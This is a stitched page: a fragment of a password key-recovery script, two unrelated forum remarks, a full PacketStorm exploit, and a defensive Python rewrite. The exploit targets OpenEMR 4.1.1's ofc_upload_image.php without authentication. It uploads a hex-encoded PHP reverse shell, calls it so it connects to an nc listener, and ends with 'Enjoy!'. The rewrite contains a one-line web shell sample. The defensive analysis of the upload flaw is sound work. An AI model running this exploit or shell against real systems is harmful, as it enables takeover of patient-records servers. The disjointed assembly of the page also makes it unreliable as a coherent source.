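    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt + digest


def verify_password(password: str, record: bytes) -> bool:
    salt, digest = record[:16], record[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)   # constant-time compare


if __name__ == "__main__":
    # Constructed table: an attacker-controlled account plus two victims.
    table = [
        ("attacker", obfuscate("correcthorsebatterystaple")),
        ("alice", obfuscate("alicepw")),
        ("bob", obfuscate("hunter2")),
    ]
    stream = recover_key(table[0][1], "correcthorsebatterystaple")
    print("recovered key stream:", stream)
    print("decoded table:", dump_table(table, stream[:12]))
```

The password used for key recovery is longer than the key on purpose: with a password shorter than twelve characters you recover only part of the key stream and need a second known plaintext (or a guess at the structure) to get the rest.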
-
You've got enough "experts", now that you're offering services too.
-
What am I, a translator? Should I translate every post I make? Go to school, learn a little English; if that doesn't work out, Google is your friend. Posers.
-
OpenEMR version 4.1.1 suffers from an arbitrary file upload vulnerability in ofc_upload_image.php. Included is an exploit that triggers a reverse shell.

<?php
/*

OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability

Vendor: OpenEMR
Product web page: http://www.open-emr.org
Affected version: 4.1.1

Summary: OpenEMR is a Free and Open Source electronic health records and medical practice management application that can run on Windows, Linux, Mac OS X, and many other platforms.

Desc: The vulnerability is caused due to the improper verification of uploaded files in the '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script through the 'name' parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script with multiple extensions.

================================================================================
/library/openflashchart/php-ofc-library/ofc_upload_image.php:
-------------------------------------------------------------

21: $default_path = '../tmp-upload-images/';
23: if (!file_exists($default_path)) mkdir($default_path, 0777, true);
26: $destination = $default_path . basename( $_GET[ 'name' ] );
28: echo 'Saving your image to: '. $destination;
39: $jfh = fopen($destination, 'w') or die("can't open file");
40: fwrite($jfh, $HTTP_RAW_POST_DATA);
41: fclose($jfh);
46: exit();

================================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Fedora Linux
           Apache2, PHP 5.4
           MySQL 5.5

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5126
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php

09.02.2013

*/

error_reporting(0);
set_time_limit(0);

$go = "\033[0;92m";
$no = "\033[0;37m";
echo $no;

$host = $argv[1];
$sock = fsockopen($host, 80, $errno, $errstr, 30);

if(!$sock) {
    echo "\n> $errstr ($errno)\n";
    die();
}

// hex-encoded payload -> raw bytes
function r_shell($sc) {
    $exec = '';
    for($z = 0; $z < strlen($sc); $z += 2)
        $exec .= chr(hexdec(substr($sc,$z,2)));
    return $exec;
}

print "\n+--------------------------------------------------------+";
print "\n+                                                        +";
print "\n+ OpenEMR 4.1.1 Remote Reverse Shell Exploit (pre-auth)  +";
print "\n+                                                        +";
print "\n+ ID: ZSL-2013-5126                                      +";
print "\n+                                                        +";
print "\n+ Copyleft (c) 2013, Zero Science Lab                    +";
print "\n+                                                        +";
print "\n+--------------------------------------------------------+\n\n";

// PoC for Linux
// Before running this script, listen on 127.0.0.1: nc -vv -n -l -p 1234
// (the embedded PHP reverse shell connects back to 127.0.0.1:1234; change
// the $ip/$port inside the hex payload for a remote listener)

if ($argc < 2) {
    print "\n> Usage: php $argv[0] <target>\n\n";
    die();
}

$pl = r_shell("3c3f7068700d0a". "7365745f74696d". "655f6c696d6974". "202830293b0d0a". "246970203d2027". "3132372e302e30". "2e31273b0d0a24". "706f7274203d20". "313233343b0d0a". "246368756e6b5f". "73697a65203d20". "313430303b0d0a". "2477726974655f". "61203d206e756c". "6c3b2024657272". "6f725f61203d20". "6e756c6c3b0d0a". "247368656c6c20". "3d2027756e616d". "65202d613b2077". "3b2069643b202f". "62696e2f736820". "2d69273b0d0a24". "6461656d6f6e20". "3d20303b202464". "65627567203d20". "303b0d0a696620". "2866756e637469". "6f6e5f65786973". "7473282770636e". "746c5f666f726b". "272929207b0d0a". "24706964203d20". "70636e746c5f66". "6f726b28293b0d". 
"0a696620282470". "6964203d3d202d". "3129207b0d0a70". "72696e74697428". "224552524f523a". "2043616e277420". "666f726b22293b". "20657869742831". "293b7d0d0a6966". "20282470696429". "207b6578697428". "30293b7d0d0a69". "662028706f7369". "785f7365747369". "642829203d3d20". "2d3129207b0d0a". "7072696e746974". "28224572726f72". "3a2043616e2774". "20736574736964". "282922293b2065". "7869742831293b". "7d0d0a24646165". "6d6f6e203d2031". "3b7d20656c7365". "207b0d0a707269". "6e746974282257". "41524e494e473a". "204661696c6564". "20746f20646165". "6d6f6e6973652e". "20205468697320". "69732071756974". "6520636f6d6d6f". "6e20616e64206e". "6f742066617461". "6c2e22293b7d0d". "0a636864697228". "222f22293b2075". "6d61736b283029". "3b0d0a24736f63". "6b203d2066736f". "636b6f70656e28". "2469702c202470". "6f72742c202465". "72726e6f2c2024". "6572727374722c". "203330293b0d0a". "69662028212473". "6f636b29207b0d". "0a7072696e7469". "74282224657272". "73747220282465". "72726e6f292229". "3b206578697428". "31293b7d0d0a24". "64657363726970746f7273706563203d206172726179280d0a30203d3e206172726179282270". "697065222c20227222292c0d0a31203d3e206172726179282270697065222c20227722292c0d". "0a32203d3e206172726179282270697065222c2022772229293b0d0a2470726f63657373203d". "2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c202470". "69706573293b0d0a696620282169735f7265736f75726365282470726f636573732929207b0d". "0a7072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0d". "0a657869742831293b7d0d0a73747265616d5f7365745f626c6f636b696e6728247069706573". "5b305d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b31". "5d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c". "2030293b0d0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0d0a". "7072696e74697428225375636365737366756c6c79206f70656e656420726576657273652073". "68656c6c20746f202469703a24706f727422293b0d0a7768696c6520283129207b0d0a696620". 
"2866656f662824736f636b2929207b0d0a7072696e74697428224552524f523a205368656c6c". "20636f6e6e656374696f6e207465726d696e6174656422293b20627265616b3b7d0d0a696620". "2866656f66282470697065735b315d2929207b0d0a7072696e74697428224552524f523a2053". "68656c6c2070726f63657373207465726d696e6174656422293b20627265616b3b7d0d0a2472". "6561645f61203d2061727261792824736f636b2c202470697065735b315d2c20247069706573". "5b325d293b0d0a246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73". "656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c". "6c293b0d0a69662028696e5f61727261792824736f636b2c2024726561645f612929207b0d0a". "6966202824646562756729207072696e7469742822534f434b205245414422293b0d0a24696e". "707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0d0a69662028". "24646562756729207072696e7469742822534f434b3a2024696e70757422293b0d0a66777269". "7465282470697065735b305d2c2024696e707574293b7d0d0a69662028696e5f617272617928". "2470697065735b315d2c2024726561645f612929207b0d0a6966202824646562756729207072". "696e74697428225354444f5554205245414422293b0d0a24696e707574203d20667265616428". "2470697065735b315d2c20246368756e6b5f73697a65293b0d0a696620282464656275672920". "7072696e74697428225354444f55543a2024696e70757422293b0d0a6677726974652824736f". "636b2c2024696e707574293b7d0d0a69662028696e5f6172726179282470697065735b325d2c". "2024726561645f612929207b0d0a6966202824646562756729207072696e7469742822535444". "455252205245414422293b0d0a24696e707574203d206672656164282470697065735b325d2c". "20246368756e6b5f73697a65293b0d0a6966202824646562756729207072696e746974282253". "54444552523a2024696e70757422293b0d0a6677726974652824736f636b2c2024696e707574". "293b7d7d0d0a66636c6f73652824736f636b293b0d0a66636c6f7365282470697065735b305d". "293b0d0a66636c6f7365282470697065735b315d293b0d0a66636c6f7365282470697065735b". "325d293b0d0a70726f635f636c6f7365282470726f63657373293b0d0a66756e6374696f6e20". "7072696e746974202824737472696e6729207b0d0a6966202821246461656d6f6e29207b2070". 
"72696e74202224737472696e675c6e223b7d7d0d0a3f3e"); //PHP Reverse Shell, PTMNKY.

echo "\n> Writing reverse shell file";

// the 'name' parameter is only passed through basename(), so any extension is accepted
$pckt  = "POST /openemr/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joxypoxy.php HTTP/1.1\r\n";
$pckt .= "Host: {$host}\r\n";
$pckt .= "Content-Length: ".strlen($pl)."\r\n\r\n{$pl}";

fputs($sock, $pckt);
sleep (2);
print " ....";
echo $go."[OK]";
echo $no;

echo "\n> Calling your listener";

// the upload directory is web-served, so requesting the file executes it
$pckt  = "GET /openemr/library/openflashchart/tmp-upload-images/joxypoxy.php HTTP/1.0\r\n";
$pckt .= "Host: {$host}\r\n";
$pckt .= "Connection: Keep-Alive\r\n\r\n";

fputs($sock, $pckt);
sleep (2);
print " .........";
echo $go."[OK]";
echo $no."\n";

// interact_sh();

echo "\n> Enjoy!\n\n";

?>

Source: PacketStorm
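The quoted lines 21 to 46 of ofc_upload_image.php show the whole bug: basename() on the client-supplied name stops directory traversal but says nothing about the extension, the body is written verbatim, and ../tmp-upload-images/ is inside the web root, so the second request in the exploit simply executes what the first one wrote. The following is an added example, not OpenEMR code and not the exploit author's, that mirrors the vulnerable destination logic in Python next to a hardened version: extension allowlist, content sniffing against the claimed type, and a server-chosen filename. The magic-byte table and the allowed extensions are my choices; the upload path is the one on line 21. The example covers only the file-handling half of the problem; the script also runs with no authentication, which the exploit's "pre-auth" label points at and which needs a separate fix.

```python
import os
import posixpath
import secrets

UPLOAD_DIR = "../tmp-upload-images/"   # $default_path on line 21 of the vulnerable script
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}

# Constructed table of magic bytes for the formats an image uploader should accept.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"\xff\xd8\xff", ".jpg"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
]


def vulnerable_destination(name: str) -> str:
    """Mirrors line 26: $default_path . basename($_GET['name']).
    Traversal is neutralised, but joxypoxy.php is still written, and the
    directory is served by the web server, so the next GET executes it."""
    return UPLOAD_DIR + posixpath.basename(name)


def sniff_extension(data: bytes):
    """Return the extension implied by the body's leading bytes, or None."""
    for magic, ext in MAGIC:
        if data.startswith(magic):
            return ext
    return None


def safe_destination(name: str, data: bytes) -> str:
    """Hardened: allowlisted extension, body must match the claimed type, and
    the server picks the filename so nothing from the client reaches disk."""
    ext = os.path.splitext(posixpath.basename(name))[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    sniffed = sniff_extension(data)
    if sniffed is None:
        raise ValueError("body is not a recognised image")
    if sniffed != ext and not (sniffed == ".jpg" and ext == ".jpeg"):
        raise ValueError("body type does not match extension")
    return UPLOAD_DIR + secrets.token_hex(16) + sniffed


def accepts(name: str, data: bytes) -> bool:
    try:
        safe_destination(name, data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    php = b"<?php system($_GET['c']); ?>"          # constructed web shell body
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16      # constructed PNG header
    print(vulnerable_destination("joxypoxy.php"))
    print(accepts("joxypoxy.php", php), accepts("shell.php.png", php), accepts("pic.png", png))
    print(safe_destination("../../evil.png", png))
```

The "multiple extensions" trick the exploit header mentions (shell.php.png on a server that maps .php anywhere in the name to the PHP handler) is caught by the content check rather than the extension check, which is why both are needed; moving the upload directory outside the document root would close the execution path even if a check is bypassed.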